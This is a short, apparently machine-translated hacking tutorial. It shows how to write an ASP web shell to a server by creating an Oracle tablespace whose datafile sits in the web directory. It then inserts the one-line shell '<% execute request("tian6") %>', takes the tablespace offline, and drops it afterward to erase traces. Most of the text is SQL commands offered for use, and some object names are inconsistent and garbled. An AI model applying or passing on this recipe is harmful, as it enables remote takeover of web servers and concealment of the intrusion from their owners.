By qingya fengping
SQL> create tablespace kjtest datafile e: websitekj. asp
Size 100 k nologging;
Copy code
In this way, the Table space is created.
Note that the minimum unit of the oracle Table is 100 K.
Create a table as follows:
SQL> CREATE TABLE WEBSHELL (C varchar2 (100) tablespace tian6;
Copy code
In this way, the table is created.
Table types are generally VARCHAR. Because the table space is small, CLOB or BLOB cannot be used.
Type.
SQL> insert into WEBSHELL values (<% execute request ("tian6") %> );
Copy code
The data is written.
SQL> commit;
Copy code
The submission is complete.
After the submission is complete, the system prompts OK? NO? If you click NO...
This is because all your edits belong to offline edits and must be synchronized before they take effect. So click OK. What do you mean?
SQL> alter tablespace tian6 offline;
Copy code
OK. You have written this step into WEBSHELL.
Do not forget to wipe PP
SQL> drop tablespace kjtest including contents;
Copy code
All the above steps must be established on the premise that you know the webpage path :)